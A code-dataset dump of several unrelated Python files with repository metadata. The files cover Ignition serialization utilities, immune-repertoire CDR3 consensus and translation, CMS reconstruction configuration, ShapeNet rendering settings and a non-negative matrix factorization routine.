print(f"добавляем атрибуты функции {kwargs}")
for name, value in kwargs.items():
setattr(func, name, value)
return func
decorator.data = kwargs
return decorator
def mark_2(**kwargs_mark):
print(f"Получил аргументы {kwargs_mark}")
def decorator(func):
def inner(*args, **kwargs):
return func(*args, **kwargs)
print(f"добавляем атрибуты функции {kwargs_mark}")
for name, value in kwargs_mark.items():
setattr(inner, name, value)
return inner
return decorator
| 24.518519 | 58 | 0.614804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 224 | 0.301887 |
1fc41c98a94f4ecb65c5c9b1a3aac7dc614e2662
| 5,087 |
py
|
Python
|
shared/tools/snapshot/utils.py
|
DougMahoney/metatools
|
112340102962ff0c3e323564357cc4e848939cf7
|
[
"Apache-2.0"
] | 12 |
2020-04-10T07:09:24.000Z
|
2022-03-04T09:22:40.000Z
|
shared/tools/snapshot/utils.py
|
DougMahoney/metatools
|
112340102962ff0c3e323564357cc4e848939cf7
|
[
"Apache-2.0"
] | 5 |
2020-05-16T18:22:23.000Z
|
2022-03-29T13:19:27.000Z
|
shared/tools/snapshot/utils.py
|
DougMahoney/metatools
|
112340102962ff0c3e323564357cc4e848939cf7
|
[
"Apache-2.0"
] | 2 |
2020-12-10T15:17:40.000Z
|
2021-12-02T17:34:56.000Z
|
"""
Extraction utilities and supporting functions
Some operations are used frequently or repeated enough to be factored out.
Note that SQL can be used via the POORSQL_BINARY_PATH
Download the binary from http://architectshack.com/PoorMansTSqlFormatter.ashx
It's a phenominal utility that brilliantly normalizes SQL code.
Have friends/coworkers/peers who missed an indent? This will prevent
a diff utility from tripping up on that.
"""
from shared.tools.yaml.core import dump
from java.util import Date
# Taken from the Metatools library, copied here for convenience
def getDesignerContext(anchor=None):
"""Attempts to grab the Ignition designer context.
This is most easily done with a Vision object, like a window.
If no object is provided as a starting point, it will attempt to
get one from the designer context.
"""
from com.inductiveautomation.ignition.designer import IgnitionDesigner
if anchor is None:
try:
return IgnitionDesigner.getFrame().getContext()
except:
for windowName in system.gui.getWindowNames():
try:
anchor = system.gui.getWindow(windowName)
break
except:
pass
else:
raise LookupError("No open windows were found, so no context was derived by default.")
try:
anchor = anchor.source
except AttributeError:
pass
# Just making sure we've a live object in the tree, not just an event object
for i in range(50):
if anchor.parent is None:
break
else:
anchor = anchor.parent
if isinstance(anchor,IgnitionDesigner):
break
else:
raise RuntimeError("No Designer Context found in this object's heirarchy")
context = anchor.getContext()
return context
POORSQL_BINARY_PATH = 'C:/Workspace/bin/SqlFormatter.exe'
# from https://stackoverflow.com/a/165662/13229100
from subprocess import Popen, PIPE, STDOUT
def format_sql(raw_sql):
"""Normalize the SQL so it is consistent for diffing"""
try:
raise KeyboardInterrupt
poorsql = Popen(
[POORSQL_BINARY_PATH,
], stdout=PIPE, stdin=PIPE, stderr=STDOUT)
formatted = poorsql.communicate(input=raw_sql)[0]
return formatted.replace('\r\n', '\n').strip()
except:
return raw_sql
import java.awt.Point, java.awt.Dimension, java.util.UUID
BASE_TYPES = set([bool, float, int, long, None, str, unicode])
COERSION_MAP = {
java.awt.Point: lambda v: {'x': v.getX(), 'y': v.getY()},
java.awt.Dimension: lambda v: {'width': v.getWidth(), 'height': v.getHeight()},
java.util.UUID: lambda v: str(v),
}
def coerceValue(value, default=str):
if type(value) in BASE_TYPES:
return value
else:
return COERSION_MAP.get(type(value), default)(value)
#ptd = propsetToDict = lambda ps: dict([(p.getName(), ps.get(p)) for p in ps.getProperties()])
def propsetToDict(property_set, recurse=False, coersion=coerceValue, visited=None):
if visited is None:
visited = set()
elif property_set in visited:
return None
result_dict = {}
for prop in property_set.getProperties():
value = property_set.get(prop)
if recurse and not type(value) in BASE_TYPES:
try:
deep = propsetToDict(value, recurse, coersion, visited)
except:
try:
deep = []
for element in value:
try:
deep.append(propsetToDict(element, recurse, coersion, visited))
except:
deep.append(coersion(element))
except:
deep = None
if deep:
value = deep
else:
value = coersion(value)
else:
value = coersion(value)
result_dict[prop.getName()] = value
return result_dict
def hashmapToDict(hashmap):
return dict(
(key, hashmap.get(key))
for key in hashmap.keySet()
)
def serializeToXML(obj, context=None):
if context is None:
context = getDesignerContext()
serializer = context.createSerializer()
serializer.addObject(obj)
return serializer.serializeXML()
def stringify(obj):
if isinstance(obj, (str, unicode)):
return str(obj).replace('\r\n', '\n')
elif isinstance(obj, (list, tuple)):
return [stringify(item) for item in obj]
elif isinstance(obj, dict):
return dict((str(key),stringify(value))
for key, value
in obj.items())
elif isinstance(obj, Date):
return str(obj.toInstant()) # get the ISO8601 format
# coerce java and other objects
elif not isinstance(obj, (int, float, bool)):
return repr(obj)
return obj
def yamlEncode(obj):
return dump(stringify(obj), sort_keys=True, indent=4)
def encode(obj):
"""
Encodes object in a serializing format.
Returns tuple of serialization format's file extention and the serialized data.
"""
return '.yaml', yamlEncode(obj),
# return '.json', system.util.jsonEncode(obj, 2),
from com.inductiveautomation.ignition.common.xmlserialization import SerializationException
def getSerializationCauses(exception):
"""Many objects may not be able to deserialize if imported from an
Ignition instance with additional (but locally missing) modules.
This will drag out some of the context in an easier to scan way.
"""
causes = []
while exception:
causes.append(exception)
exception = exception.getCause()
return causes
| 25.691919 | 94 | 0.716139 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,660 | 0.326322 |
1fc6fa21c4051a53146d8cf76b830b672309eed5
| 12,203 |
py
|
Python
|
HTGTSrep/HTGTSrep/junctionsPerLibs.py
|
Yyx2626/HTGTSrep
|
d8716304b555a7b9161e5f2ce988ebfd17abc9f0
|
[
"MIT"
] | 2 |
2020-05-08T05:12:37.000Z
|
2022-03-28T02:53:03.000Z
|
HTGTSrep/HTGTSrep/junctionsPerLibs.py
|
Yyx2626/HTGTSrep
|
d8716304b555a7b9161e5f2ce988ebfd17abc9f0
|
[
"MIT"
] | 1 |
2020-03-05T04:08:39.000Z
|
2021-08-11T15:02:37.000Z
|
HTGTSrep/HTGTSrep/junctionsPerLibs.py
|
Yyx2626/HTGTSrep
|
d8716304b555a7b9161e5f2ce988ebfd17abc9f0
|
[
"MIT"
] | 4 |
2020-05-30T12:45:48.000Z
|
2022-03-31T12:24:53.000Z
|
'''import sys
import operator
from Bio.Seq import Seq
try:
from Bio.Alphabet import generic_dna, IUPAC
Bio_Alphabet = True
except ImportError:
Bio_Alphabet = None
# usages of generic_dna, IUPAC are not supported in Biopython 1.78 (September 2020).
print(f"The installed BioPython is a new version that has removed the Alphabet module.",file=sys.stderr)
def filter(statFile):
# statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
ListOfLines = []
labels = statFile.readline()
litems = labels[:-1].split("\t")
ListOfLines.append(litems)
for line in statFile:
items = line[:-1].split("\t")
ListOfLines.append(items)
return ListOfLines
def consensus(lines, CDR3_AA):
consensusLines = []
lines[0].append("CONSENSUS_SEQ")
jidx = lines[0].index("JUNC_DETAIL")
consensusLines.append(lines[0])
for line in lines[1:]:
# h = 1
# cdr = ''
juncDets = line[jidx]
# commented out useless lines JH 06032021
# for item in juncDets.split('|'):
# i1 = item.split(':')[0]
# i2 = int(item.split(':')[1])
# if i2 > h:
# h = i2
# cdr = i1
if CDR3_AA != "T":
consensus = get_consensus(juncDets)
else:
consensus = get_consensus_AA(juncDets)
line.append(consensus)
consensusLines.append(line)
return consensusLines
def get_consensus_AA(allCDR):
pos_base_num = {}
cdr3_len = len(allCDR.split('|')[0].split(':')[0])
for i in range(0, cdr3_len):
pos_base_num[i] = {"A": 0, "R": 0, "N": 0, "D": 0, "C": 0, "Q": 0, "E": 0, "G": 0, "H": 0, "I": 0, "L": 0, "K": 0, "M": 0, "F": 0, "P": 0, "S": 0, "T": 0, "W": 0, "Y": 0, "V": 0}
for seg in allCDR.split('|'):
j = seg.split(':')
for i in range(0, cdr3_len):
pos_base_num[i][j[0][i]] += int(j[1])
consensus = ''
for i in range(0, cdr3_len):
consensus += max(pos_base_num[i].items(), key=operator.itemgetter(1))[0]
return consensus
def get_consensus(allCDR):
pos_base_num = {}
cdr3_len = len(allCDR.split('|')[0].split(':')[0])
for i in range(0, cdr3_len):
pos_base_num[i] = {'A':0, 'T':0, 'C':0, 'G':0, "N":0}
for seg in allCDR.split('|'):
j = seg.split(':')
for i in range(0, cdr3_len):
pos_base_num[i][j[0][i]] += int(j[1])
consensus = ''
for i in range(0, cdr3_len):
consensus += max(pos_base_num[i].items(), key=operator.itemgetter(1))[0]
return consensus
def translate(listLines, CDR3_AA):
dnas = []
listLines[0].append("AA_SEQUENCE")
dnas.append(listLines[0])
conSeq = listLines[0].index("CONSENSUS_SEQ")
# i=0
if CDR3_AA != "T":
for line in listLines[1:]:
seq = line[conSeq]
while len(seq)%3 != 0:
seq += "N"
if Bio_Alphabet:
AA = Seq(seq, generic_dna).translate()
else:
AA = Seq(seq).translate()
# i+=1
line.append(str(AA))
dnas.append(line)
else:
for line in listLines[1:]:
seq = line[conSeq]
AA = seq
# i+=1
line.append(str(AA))
dnas.append(line)
return dnas
def main():
# statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
clonestat = open(sys.argv[1], "r")
CDR3_AA = sys.argv[2]
toParse = filter(clonestat)
toTranslate = consensus(toParse,CDR3_AA)
translated = translate(toTranslate,CDR3_AA) #already translated allsample.stat file, a list of lines in a file
libsfile = sys.argv[3:] #read in each library's clonestat file to create lib_detail
# # useless lines JH 06032021
# c=0
# libscloneDict = {} ##lib, clone: cdr3seq, num
# cdr3dict = {} ###seq, num : lib, clone
listOfSingleLibraryDicts = []
for library in libsfile:
libstatfile = open(library, "r")
libDict = {} ##append junction details to the library dictionary, for each clone (cdr3seq,V-allele, J-allele): sample, readnum
labels = libstatfile.readline()[:-1].split("\t")
juncIdx = labels.index("JUNC_DETAIL")
vidx = labels.index("V_ALLELE")
jidx = labels.index("J_ALLELE")
sIdx = labels.index("SAMPLE_DETAIL")
for line in libstatfile: #iterate through all the clones in a single library
items = line[:-1].split("\t")
v_allele = items[vidx]
j_allele = items[jidx]
juncDetails = items[juncIdx].split("|")
sample = items[sIdx]
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seq = seqSpecs[0]
readNum = seqSpecs[1]
if (cdr3seq, v_allele, j_allele) not in libDict:
libDict[(cdr3seq, v_allele, j_allele)] = (sample, readNum)
#else:
# print(cdr3seq, readNum)
listOfSingleLibraryDicts.append(libDict)
# print(listOfSingleLibraryDicts)
translated[0].append("LIB_DETAIL") # will contain all lines of master clone file
labels = translated[0] # clonestat.readline()[:-1].split("\t")
idxJD = labels.index("JUNC_DETAIL")
# idxClone = labels.index("CLONE")
idxV = labels.index("V_ALLELE")
idxJ = labels.index("J_ALLELE")
for line in translated[1:2]: #clonestat:
v_allele = line[idxV]
j_allele = line[idxJ]
juncDetails = line[idxJD].split("|")
libDetailString = ''
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seqJ = seqSpecs[0]
# readNum = seqSpecs[1]
tuple2check = (cdr3seqJ, v_allele, j_allele)
print(tuple2check,seqSpecs)
for dict in listOfSingleLibraryDicts:
if tuple2check in dict:
libDetailString += dict[tuple2check][0] + ":" + cdr3seqJ + ":" + dict[tuple2check][1] + "|"
print(libDetailString)
if libDetailString[-1] == "|":
line.append(libDetailString[:-1])
else:
line.append(libDetailString)
for i in translated:
print("\t".join(i))
main()
'''
import sys
import operator
from Bio.Seq import Seq
try:
from Bio.Alphabet import generic_dna, IUPAC
Bio_Alphabet = True
except ImportError:
Bio_Alphabet = None
# usages of generic_dna, IUPAC are not supported in Biopython 1.78 (September 2020).
print(f"The installed BioPython is a new version that has removed the Alphabet module.",file=sys.stderr)
def filter(statFile):
# statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
ListOfLines = []
labels = statFile.readline()
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# litems = labels[:-1].split("\t")
litems = labels.replace("\n", "").split("\t")
ListOfLines.append(litems)
for line in statFile:
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# items = line[:-1].split("\t")
items = line.replace("\n", "").split("\t")
ListOfLines.append(items)
return ListOfLines
def consensus(lines):
consensusLines = []
lines[0].append("CONSENSUS_SEQ")
jidx = lines[0].index("JUNC_DETAIL")
consensusLines.append(lines[0])
for line in lines[1:]:
# h = 1
# cdr = ''
juncDets = line[jidx]
# commented out useless lines JH 06032021
# for item in juncDets.split('|'):
# i1 = item.split(':')[0]
# i2 = int(item.split(':')[1])
# if i2 > h:
# h = i2
# cdr = i1
consensus = get_consensus(juncDets)
line.append(consensus)
consensusLines.append(line)
return consensusLines
def get_consensus(allCDR):
pos_base_num = {}
cdr3_len = len(allCDR.split('|')[0].split(':')[0])
for i in range(0, cdr3_len):
pos_base_num[i] = {'A':0, 'T':0, 'C':0, 'G':0, "N":0}
for seg in allCDR.split('|'):
j = seg.split(':')
for i in range(0, cdr3_len):
pos_base_num[i][j[0][i]] += int(j[1])
consensus = ''
for i in range(0, cdr3_len):
consensus += max(pos_base_num[i].items(), key=operator.itemgetter(1))[0]
return consensus
def translate(listLines):
dnas = []
listLines[0].append("AA_SEQUENCE")
dnas.append(listLines[0])
conSeq = listLines[0].index("CONSENSUS_SEQ")
# i=0
for line in listLines[1:]:
seq = line[conSeq]
while len(seq) % 3 != 0:
seq += "N"
if Bio_Alphabet:
AA = Seq(seq, generic_dna).translate()
else:
AA = Seq(seq).translate()
# i+=1
line.append(str(AA))
dnas.append(line)
return dnas
def main():
# NOTE statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
clonestat = open(sys.argv[1], "r")
toParse = filter(clonestat)
toTranslate = consensus(toParse)
translated = translate(toTranslate) #already translated allsample.stat file, a list of lines in a file
libsfile = sys.argv[2:] # read in each library's clonestat file to create lib_detail
# # useless lines JH 06032021
# c=0
# libscloneDict = {} ##lib, clone: cdr3seq, num
# cdr3dict = {} ###seq, num : lib, clone
listOfSingleLibraryDicts = []
for library in libsfile:
libstatfile = open(library, "r")
libDict = {} ##append junction details to the library dictionary, for each clone (cdr3seq,V-allele, J-allele): sample, readnum
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# labels = libstatfile.readline()[:-1].split("\t")
labels = libstatfile.readline().replace("\n", "").split("\t")
juncIdx = labels.index("JUNC_DETAIL")
vidx = labels.index("V_ALLELE")
jidx = labels.index("J_ALLELE")
sIdx = labels.index("SAMPLE_DETAIL")
for line in libstatfile: #iterate through all the clones in a single library
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# items = line[:-1].split("\t")
items = line.replace("\n", "").split("\t")
v_allele = items[vidx]
j_allele = items[jidx]
juncDetails = items[juncIdx].split("|")
sample = items[sIdx]
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seq = seqSpecs[0]
readNum = seqSpecs[1]
if (cdr3seq, v_allele, j_allele) not in libDict:
libDict[(cdr3seq, v_allele, j_allele)] = (sample, readNum)
#else:
# print(cdr3seq, readNum)
listOfSingleLibraryDicts.append(libDict)
# print(listOfSingleLibraryDicts)
translated[0].append("LIB_DETAIL") # will contain all lines of master clone file
labels = translated[0] # clonestat.readline()[:-1].split("\t")
idxJD = labels.index("JUNC_DETAIL")
# idxClone = labels.index("CLONE")
idxV = labels.index("V_ALLELE")
idxJ = labels.index("J_ALLELE")
for line in translated[1:]: #clonestat:
v_allele = line[idxV]
j_allele = line[idxJ]
juncDetails = line[idxJD].split("|")
libDetailString = ''
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seqJ = seqSpecs[0]
# readNum = seqSpecs[1]
tuple2check = (cdr3seqJ, v_allele, j_allele)
for dict in listOfSingleLibraryDicts:
if tuple2check in dict:
libDetailString += dict[tuple2check][0] + ":" + cdr3seqJ + ":" + dict[tuple2check][1] + "|"
if libDetailString[-1] == "|":
line.append(libDetailString[:-1])
else:
line.append(libDetailString)
for i in translated:
print("\t".join(i))
main()
| 35.891176 | 186 | 0.578137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,313 | 0.681226 |
1fc8f64a1c48e617dc27ddaba536434b9f8ea44b
| 4,915 |
py
|
Python
|
Configuration/GlobalRuns/python/reco_TLR_311X.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 852 |
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
Configuration/GlobalRuns/python/reco_TLR_311X.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 30,371 |
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
Configuration/GlobalRuns/python/reco_TLR_311X.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 3,240 |
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
import FWCore.ParameterSet.Config as cms
def customiseCommon(process):
#####################################################################################################
####
#### Top level replaces for handling strange scenarios of early collisions
####
## TRACKING:
process.newSeedFromTriplets.OrderedHitsFactoryPSet.GeneratorPSet.maxElement = cms.uint32(100000)
process.newSeedFromPairs.OrderedHitsFactoryPSet.maxElement = cms.uint32(100000)
process.secTriplets.OrderedHitsFactoryPSet.GeneratorPSet.maxElement = cms.uint32(100000)
process.thTripletsA.OrderedHitsFactoryPSet.GeneratorPSet.maxElement = cms.uint32(100000)
process.thTripletsB.OrderedHitsFactoryPSet.GeneratorPSet.maxElement = cms.uint32(100000)
process.fourthPLSeeds.OrderedHitsFactoryPSet.maxElement = cms.uint32(100000)
process.fifthSeeds.OrderedHitsFactoryPSet.maxElement = cms.uint32(100000)
###### FIXES TRIPLETS FOR LARGE BS DISPLACEMENT ######
### prevent bias in pixel vertex
process.pixelVertices.useBeamConstraint = False
###
### end of top level replacements
###
###############################################################################################
return (process)
##############################################################################
def customisePPData(process):
process= customiseCommon(process)
## particle flow HF cleaning
process.particleFlowRecHitHCAL.LongShortFibre_Cut = 30.
process.particleFlowRecHitHCAL.ApplyPulseDPG = True
## HF cleaning for data only
process.hcalRecAlgos.SeverityLevels[3].RecHitFlags.remove("HFDigiTime")
process.hcalRecAlgos.SeverityLevels[4].RecHitFlags.append("HFDigiTime")
##beam-halo-id for data only
process.CSCHaloData.ExpectedBX = cms.int32(3)
## hcal hit flagging
process.hfreco.PETstat.flagsToSkip = 2
process.hfreco.S8S1stat.flagsToSkip = 18
process.hfreco.S9S1stat.flagsToSkip = 26
return process
##############################################################################
def customisePPMC(process):
process=customiseCommon(process)
return process
##############################################################################
def customiseCosmicData(process):
return process
##############################################################################
def customiseCosmicMC(process):
return process
##############################################################################
def customiseVALSKIM(process):
process= customisePPData(process)
process.reconstruction.remove(process.lumiProducer)
return process
##############################################################################
def customiseExpress(process):
process= customisePPData(process)
import RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi
process.offlineBeamSpot = RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi.onlineBeamSpotProducer.clone()
return process
##############################################################################
def customisePrompt(process):
process= customisePPData(process)
return process
##############################################################################
##############################################################################
def customiseCommonHI(process):
###############################################################################################
####
#### Top level replaces for handling strange scenarios of early HI collisions
####
## Offline Silicon Tracker Zero Suppression
process.siStripZeroSuppression.Algorithms.CommonModeNoiseSubtractionMode = cms.string("IteratedMedian")
process.siStripZeroSuppression.Algorithms.CutToAvoidSignal = cms.double(2.0)
process.siStripZeroSuppression.Algorithms.Iterations = cms.int32(3)
process.siStripZeroSuppression.storeCM = cms.bool(True)
###
### end of top level replacements
###
###############################################################################################
return process
##############################################################################
def customiseExpressHI(process):
process= customiseCommonHI(process)
import RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi
process.offlineBeamSpot = RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi.onlineBeamSpotProducer.clone()
return process
##############################################################################
def customisePromptHI(process):
process= customiseCommonHI(process)
import RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi
process.offlineBeamSpot = RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi.onlineBeamSpotProducer.clone()
return process
##############################################################################
| 36.407407 | 107 | 0.545677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,856 | 0.37762 |
1fcb25844610f792402d0768084d92368a8057d1
| 4,838 |
py
|
Python
|
renderer/settings.py
|
12564985/DeFMO
|
8ed9c2963678e2c59c7431ec8786302eea841572
|
[
"MIT"
] | 1 |
2022-03-14T12:46:38.000Z
|
2022-03-14T12:46:38.000Z
|
renderer/settings.py
|
12564985/DeFMO
|
8ed9c2963678e2c59c7431ec8786302eea841572
|
[
"MIT"
] | null | null | null |
renderer/settings.py
|
12564985/DeFMO
|
8ed9c2963678e2c59c7431ec8786302eea841572
|
[
"MIT"
] | null | null | null |
## TODO: insert your ShapeNetCore.v2, textures, training and testing background paths
# NOTE that HDF5 is not generated here, to convert the dataset to HDF5 use dataloaders/conversion.py
g_datasets_path = '/mnt/lascar/rozumden/dataset'
g_shapenet_path = g_datasets_path + '/ShapeNetv2/ShapeNetCore.v2'
g_textures_path = g_datasets_path + '/ShapeNetv2/textures'
g_train_backgrounds_path = g_datasets_path + '/vot/'
g_test_backgrounds_path = g_datasets_path + '/sports1m/seq/'
## TODO: insert path to save the generated dataset
g_generated_dataset_path = 'mnt/lascar/rozumden/dataset/ShapeNetv2'
## TODO: insert your blender-2.79b path
g_blender_excutable_path = '/home.stud/rozumden/src/blender-2.79b-linux-glibc219-x86_64/blender'
g_view_point_file = {'view_points/chair.txt', 'view_points/bottle.txt', 'view_points/diningtable.txt', 'view_points/sofa.txt', 'view_points/bed.txt'}
g_render_objs_train = ['table','jar', 'skateboard', 'bottle' , 'tower' ,'chair' ,'bookshelf' ,'camera' ,'laptop' ,'basket' , 'sofa' ,'knife' , 'can' , 'rifle' , 'train' , 'lamp' , 'trash bin' , 'mailbox' , 'watercraft' , 'motorbike' , 'dishwasher' , 'bench' , 'pistol' , 'rocket' , 'loudspeaker' , 'file cabinet' , 'bag' , 'cabinet' , 'bed' , 'birdhouse' , 'display' , 'piano' , 'earphone' , 'telephone' , 'stove' , 'microphone', 'mug', 'remote', 'bathtub' , 'bowl' , 'keyboard', 'guitar' , 'washer', 'faucet' , 'printer' , 'cap' , 'clock', 'helmet', 'flowerpot', 'microwaves']
g_render_objs = g_render_objs_train
if True:
print('Rendering training dataset')
g_number_per_category = 1000
g_texture_path = g_textures_path+'/textures_train/'
g_background_image_path = g_train_backgrounds_path
else:
print('Rendering testing dataset')
g_number_per_category = 20
g_texture_path = g_textures_path+'/textures_test/'
g_background_image_path = g_test_backgrounds_path
g_max_trials = 50 ## max trials per sample to generate a nice FMO (inside image, etc)
#folders to store synthetic data
g_syn_rgb_folder = g_generated_dataset_path+'/ShapeBlur'+str(g_number_per_category)+'STA/' # small textured light average-light
g_temp = g_syn_rgb_folder+g_render_objs[0]+'/'
#camera:
#enum in [‘QUATERNION’, ‘XYZ’, ‘XZY’, ‘YXZ’, ‘YZX’, ‘ZXY’, ‘ZYX’, ‘AXIS_ANGLE’]
g_rotation_mode = 'XYZ'
#output:
g_fmo_steps = 24
#enum in [‘BW’, ‘RGB’, ‘RGBA’], default ‘BW’
g_rgb_color_mode = 'RGBA'
#enum in [‘8’, ‘10’, ‘12’, ‘16’, ‘32’], default ‘8’
g_rgb_color_depth = '16'
g_rgb_color_max = 2**int(g_rgb_color_depth)
g_rgb_file_format = 'PNG'
g_depth_use_overwrite = True
g_depth_use_file_extension = True
g_use_film_transparent = True
#dimension:
#engine type [CYCLES, BLENDER_RENDER]
g_engine_type = 'CYCLES'
#output image size = (g_resolution_x * resolution_percentage%, g_resolution_y * resolution_percentage%)
g_resolution_x = 640
g_resolution_y = 480
g_resolution_percentage = 100/2
g_render_light = False
g_ambient_light = True
g_apply_texture = True
g_skip_low_contrast = True
g_skip_small = True
g_bg_color = (0.6, 0.6, 0.6) # (1.0,1.0,1.0) # (0.5, .1, 0.6)
#performance:
g_gpu_render_enable = False
#if you are using gpu render, recommand to set hilbert spiral to 256 or 512
#default value for cpu render is fine
g_hilbert_spiral = 512
#total 55 categories
g_shapenet_categlory_pair = {
'table' : '04379243',
'jar' : '03593526',
'skateboard' : '04225987',
'car' : '02958343',
'bottle' : '02876657',
'tower' : '04460130',
'chair' : '03001627',
'bookshelf' : '02871439',
'camera' : '02942699',
'airplane' : '02691156',
'laptop' : '03642806',
'basket' : '02801938',
'sofa' : '04256520',
'knife' : '03624134',
'can' : '02946921',
'rifle' : '04090263',
'train' : '04468005',
'pillow' : '03938244',
'lamp' : '03636649',
'trash bin' : '02747177',
'mailbox' : '03710193',
'watercraft' : '04530566',
'motorbike' : '03790512',
'dishwasher' : '03207941',
'bench' : '02828884',
'pistol' : '03948459',
'rocket' : '04099429',
'loudspeaker' : '03691459',
'file cabinet' : '03337140',
'bag' : '02773838',
'cabinet' : '02933112',
'bed' : '02818832',
'birdhouse' : '02843684',
'display' : '03211117',
'piano' : '03928116',
'earphone' : '03261776',
'telephone' : '04401088',
'stove' : '04330267',
'microphone' : '03759954',
'bus' : '02924116',
'mug' : '03797390',
'remote' : '04074963',
'bathtub' : '02808440',
'bowl' : '02880940',
'keyboard' : '03085013',
'guitar' : '03467517',
'washer' : '04554684',
'mobile phone' : '02992529', #
'faucet' : '03325088',
'printer' : '04004475',
'cap' : '02954340',
'clock' : '03046257',
'helmet' : '03513137',
'flowerpot' : '03991062',
'microwaves' : '03761084'
}
# bicycle 02834778
| 35.573529 | 582 | 0.668251 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,931 | 0.596945 |
1fcc73246e5b2e2deb6ef1a5498a653dfdea012b
| 3,094 |
py
|
Python
|
pynm/feature/extract/nmf.py
|
ohtaman/pynm
|
b003962201e4270d0dab681ede37f2d8edd560f2
|
[
"MIT"
] | 1 |
2018-08-16T20:48:52.000Z
|
2018-08-16T20:48:52.000Z
|
pynm/feature/extract/nmf.py
|
ohtaman/pynm
|
b003962201e4270d0dab681ede37f2d8edd560f2
|
[
"MIT"
] | 5 |
2015-01-12T20:40:46.000Z
|
2017-11-17T01:27:41.000Z
|
pynm/feature/extract/nmf.py
|
ohtaman/pynm
|
b003962201e4270d0dab681ede37f2d8edd560f2
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
import numpy
import numpy.random
import numpy.linalg
from . import svd
def svd_init(matrix, dim, seed=None):
u, s, v = svd.svd(matrix, dim)
ss = numpy.sqrt(numpy.diag(s))
return numpy.maximum(0.001, u.dot(ss)), numpy.maximum(0.001, ss.dot(v))
def random_init(matrix, dim, seed=None):
np_random = numpy.random.RandomState(seed)
w = np_random.uniform(size=(matrix.shape[0], dim))
h = np_random.uniform(size=(dim, matrix.shape[1]))
return w, h
def _improve_beta_divergence(orig, current, w, h, epsilon=1e-9, beta=2.0):
if beta < 1:
phi = 1.0/(2.0-beta)
elif beta <= 2.0:
phi = 1.0
else:
phi = 1.0/(beta - 1.0)
wt = w.transpose()
h *= (wt.dot(orig * current**(beta - 2))/(wt.dot(current**(beta - 1)) + epsilon))**phi
ht = h.transpose()
current = w.dot(h)
w *= ((orig * current**(beta - 2)).dot(ht)/((current**(beta - 1)).dot(ht) + epsilon))**phi
return w.dot(h), w, h
def _improve_euclidean_distance(orig, current, w, h, epsilon=1e-9):
wt = w.transpose()
h *= wt.dot(orig)/(wt.dot(current) + epsilon)
ht = h.transpose()
current = w.dot(h)
w *= orig.dot(ht)/(current.dot(ht) + epsilon)
return w.dot(h), w, h
def _improve_kl_diveregence(orig, current, w, h, epsilon=1e-9):
ws = w.sum(axis=0)
wt = (w/(ws + epsilon)).transpose()
h *= wt.dot(orig/(current + epsilon))
ht = h.transpose()
hs = ht.sum(axis=0)
current = w.dot(h)
w *= (orig/(current + epsilon)).dot(ht/(hs + epsilon))
return w.dot(h), w, h
def nmf(matrix,
dim=None,
distance="euclid",
init=svd_init,
max_iter=10000,
threshould=0.001,
epsilon=1e-9,
seed=None):
"""Non-negative Matrix Factorization function
:param numpy.array matrix: Matrix to decompose
:param int dim: dimension of matrix
:param float distance: distance to minimize. choose "euclid" or "kl".
euclid: Euclid distance
k: Kullback Leibler divergence
default: "euclid"
:param int max_iter: max #iteration of calculation
defau:t] 10000
:param float thresould: threshould to regard as converged
:param float epsilon: epsilon to avoid zero division
:param int seed: random seed
:return: factorized matrix w and h
"""
max_rank = min(matrix.shape)
dim = min(dim, max_rank) if dim is not None else max_rank
if distance == "euclid":
_improve = _improve_euclidean_distance
elif distance == "kl":
_improve = _improve_kl_diveregence
elif distance == "beta":
_improve = _improve_beta_divergence
w, h = init(matrix, dim, seed)
wh = w.dot(h)
prev_norm = numpy.linalg.norm(matrix - wh)
for _ in range(max_iter):
wh, w, h = _improve(matrix, wh, w, h, epsilon)
norm = numpy.linalg.norm(matrix - wh)
improvement = (prev_norm - norm)/prev_norm
if improvement < threshould:
break
prev_norm = norm
return w, h
| 29.75 | 94 | 0.597931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 690 | 0.223012 |
1fccf8df9831cb035ab2861081b74267181cefc9
| 6,052 |
py
|
Python
|
examples/demo_livepeer.py
|
scout-cool/Bubbletea
|
f0312d6f1c7fde4098d500e811f0503796973d07
|
[
"Apache-2.0"
] | 10 |
2021-08-29T14:58:09.000Z
|
2022-02-07T21:03:07.000Z
|
examples/demo_livepeer.py
|
scout-cool/Bubbletea
|
f0312d6f1c7fde4098d500e811f0503796973d07
|
[
"Apache-2.0"
] | null | null | null |
examples/demo_livepeer.py
|
scout-cool/Bubbletea
|
f0312d6f1c7fde4098d500e811f0503796973d07
|
[
"Apache-2.0"
] | null | null | null |
import datetime
